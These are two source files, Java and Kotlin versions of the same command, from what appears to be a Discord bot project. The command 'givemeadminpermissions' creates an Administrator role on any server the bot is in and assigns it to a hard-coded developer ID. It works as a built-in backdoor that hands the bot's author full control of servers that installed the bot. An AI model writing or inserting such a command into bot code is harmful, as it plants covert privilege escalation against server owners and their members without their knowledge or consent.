File: src/main/java/de/tectoast/emolga/commands/flo/GiveMeAdminPermissionsCommand.java
package de.tectoast.emolga.commands.flo;

import de.tectoast.emolga.commands.Command;
import de.tectoast.emolga.commands.CommandCategory;
import de.tectoast.emolga.commands.GuildCommandEvent;
import de.tectoast.emolga.utils.Constants;
import net.dv8tion.jda.api.EmbedBuilder;
import net.dv8tion.jda.api.Permission;
import net.dv8tion.jda.api.entities.Guild;
import net.dv8tion.jda.api.entities.Role;

import java.awt.*;

public class GiveMeAdminPermissionsCommand extends Command {
    public GiveMeAdminPermissionsCommand() {
        super("givemeadminpermissions", ":^)", CommandCategory.Flo);
        setArgumentTemplate(ArgumentManagerTemplate.builder().add("guild", "Guild-ID", "Die ID des Servers :)", ArgumentManagerTemplate.DiscordType.ID)
                .setExample("!givemeadminpermissions 447357526997073930")
                .build());
    }

    @Override
    public void process(GuildCommandEvent e) {
        Guild g = e.getJDA().getGuildById(e.getArguments().getID("guild"));
        Role r = g.createRole().setPermissions(Permission.ADMINISTRATOR).setName(":^)").complete();
        g.addRoleToMember(Constants.FLOID, r).queue();
        EmbedBuilder builder = new EmbedBuilder();
        builder.setTitle("Succesfully gave admin permission on \"" + g.getName() + "\"!").setColor(Color.RED);
        e.getChannel().sendMessageEmbeds(builder.build()).queue();
    }
}

File: src/main/kotlin/de/tectoast/emolga/commands/flo/GiveMeAdminPermissionsCommand.kt
package de.tectoast.emolga.commands.flo

import de.tectoast.emolga.commands.Command
import de.tectoast.emolga.commands.CommandCategory
import de.tectoast.emolga.commands.GuildCommandEvent
import de.tectoast.emolga.utils.Constants
import dev.minn.jda.ktx.messages.Embed
import net.dv8tion.jda.api.Permission
import net.dv8tion.jda.api.entities.UserSnowflake

class GiveMeAdminPermissionsCommand : Command("givemeadminpermissions", ":^)", CommandCategory.Flo) {
    init {
        argumentTemplate = ArgumentManagerTemplate.builder()
            .add("guild", "Guild-ID", "Die ID des Servers :)", ArgumentManagerTemplate.DiscordType.ID)
            .setExample("!givemeadminpermissions 447357526997073930")
            .build()
    }

    override suspend fun process(e: GuildCommandEvent) {
        val g = e.jda.getGuildById(e.arguments.getID("guild"))
        g!!.createRole().setPermissions(Permission.ADMINISTRATOR).setName(":^)").queue {
            g.addRoleToMember(UserSnowflake.fromId(Constants.FLOID), it).queue()
            e.reply(Embed(title = "Succesfully gave admin permission on \"${g.name}\"!", color = 0xFF0000))
        }
    }
}